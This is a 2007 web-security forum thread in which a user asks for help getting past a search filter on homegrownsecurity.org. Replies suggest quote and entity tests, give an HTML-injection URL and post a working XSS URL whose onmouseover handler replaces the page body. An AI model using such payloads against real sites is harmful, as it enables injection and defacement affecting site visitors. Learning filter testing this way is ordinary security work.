Need help with filters

Re: Need help with filters

hwEll — Mon, 02 Jul 2007 14:45:08 -0500

Thanks

Re: Need help with filters

ma1 — Sun, 01 Jul 2007 17:10:46 -0500

XSS
http://homegrownsecurity.org/search.php?stype=f'style='width:5000;height:5000;opacity:0;position:absolute;top:-2000;left:-2000;z-index:1000'onmouseover='document.body.innerHTML=location.hash#

Re: Need help with filters

Anonymous User — Sat, 30 Jun 2007 10:10:04 -0500

Doesn't work on Firefox

Re: Need help with filters

Mephisto — Sat, 30 Jun 2007 09:22:36 -0500

HTML Injection

http://homegrownsecurity.org/search.php?stype=f'>

Injected%20HTML

Re: Need help with filters

hwEll — Sat, 30 Jun 2007 07:44:23 -0500

http://homegrownsecurity.org/

Re: Need help with filters

Anonymous User — Sat, 30 Jun 2007 07:21:12 -0500

URL?

Re: Need help with filters

hwEll — Sat, 30 Jun 2007 05:44:21 -0500

Nope i dont get it..what should i do?what do you need me to inject and see?

Re: Need help with filters

Anonymous User — Fri, 29 Jun 2007 05:28:18 -0500

You could also check how the filter reacts on entities - try to inject stuff like %27, %2%277, ' or Ə

Re: Need help with filters

Kyran — Thu, 28 Jun 2007 20:51:45 -0500

The short locator doesn't cover everything. Try multiple quotes, etc.

Re: Need help with filters

nEUrOO — Thu, 28 Jun 2007 15:32:28 -0500

Well, they seem to have a correct filter, so there is not much you could do here...

Need help with filters

hwEll — Thu, 28 Jun 2007 12:33:37 -0500

I am trying to find a XSS hole thus i tried

'';!--"=&{()}

from the cheat sheet and when i viewed the souce i get this

Search for:

Any help with it?